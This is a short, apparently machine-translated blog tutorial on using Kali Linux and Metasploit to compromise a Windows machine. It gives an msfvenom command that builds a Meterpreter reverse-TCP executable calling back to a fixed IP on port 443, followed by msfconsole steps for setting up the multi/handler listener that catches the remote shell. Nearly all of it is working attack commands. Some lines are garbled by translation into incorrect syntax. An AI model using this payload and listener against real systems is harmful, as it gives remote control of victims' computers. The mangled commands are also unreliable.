Kali- use metasploit the exploit / multi / handler attack

Generation connectivity software in the attack on the server, LHOST for the attack machine IP address

msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.52.133 LPORT = 443 -f exe -o met.exe
open msfconsole Console


software distributed to run on the client, In this case there will be prompted to connect kali
[mw_shl_code = AppleScript, to true] qzwhost the root @: ~ # msfconsole 
msfconsole> use exploit / Multi / Handler
msfconsole (exploit / Multi / Handler)> SET the PAYLOAD Windows / Meterpreter / reverse_tcp
msfconsole (exploit / Multi / Handler)> SET lhost <the IP>
msfconsole (exploit / Multi / Handler)> 443 SET LPORT
msfconsole (exploit / Multi / Handler)> exploit [/ mw_shl_code]


At this time the connection is established, the input test shell



in Windows command line is Description successful attack

if the reminder below, shell input display meterpreter> shell [-] Unknown command :. shell, did not explain the link is established successfully

Meterpreter> shell
[-] Unknown the Command: shell.

Guess you like

Origin www.cnblogs.com/xyongsec/p/11068596.html